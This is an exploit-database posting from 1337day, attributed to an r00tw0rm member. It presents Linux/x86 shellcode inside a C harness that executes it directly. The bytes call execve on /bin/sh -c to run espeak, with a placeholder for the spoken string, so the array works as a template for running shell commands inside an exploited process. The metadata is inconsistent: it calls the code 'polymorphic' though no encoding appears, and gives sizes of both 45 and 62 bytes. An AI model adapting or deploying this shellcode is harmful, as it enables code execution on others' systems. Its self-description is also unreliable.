Linux/x86 - polymorphic espeak shellcode - 45 bytes



EKU-ID: 2153 CVE: OSVDB-ID:
Author: S4(uR4 Published: 2012-05-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                 I'm S4(uR4 member from r00tw0rm team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*

Name      : Linux/x86 - polymorphic espeak shellcode - 45 bytes
Date      : may, 17 2012
Author    : S4(uR4
Platform  : linux/x86
Type      : shellcode - 62 bytes
Web       : www.r00tw0rm.com
Email     : satsura@r00tw0rm.com
Tested on : linux slackware 11.3, ubuntu (10.04-12.04)
Special thanks to :  r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz (1337day.com)
                     CrosS, Xenu, Versus71 (r00tw0rm.com)

*/


int main(){
unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68"
                            "\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52"
                            "\xe8\x0a\x00\x00\x00\x65"
                            "\x73\x70\x65\x61\x6b"
                            "\x20"                
                            "\x22"
                            ""                     // Here U'r Speaking String
                            "\x22"               
                            "\x00\x57\x53\x89\xe1\xcd\x80"; // 45 bytes without string

(*(void (*)()) shellcode)();
}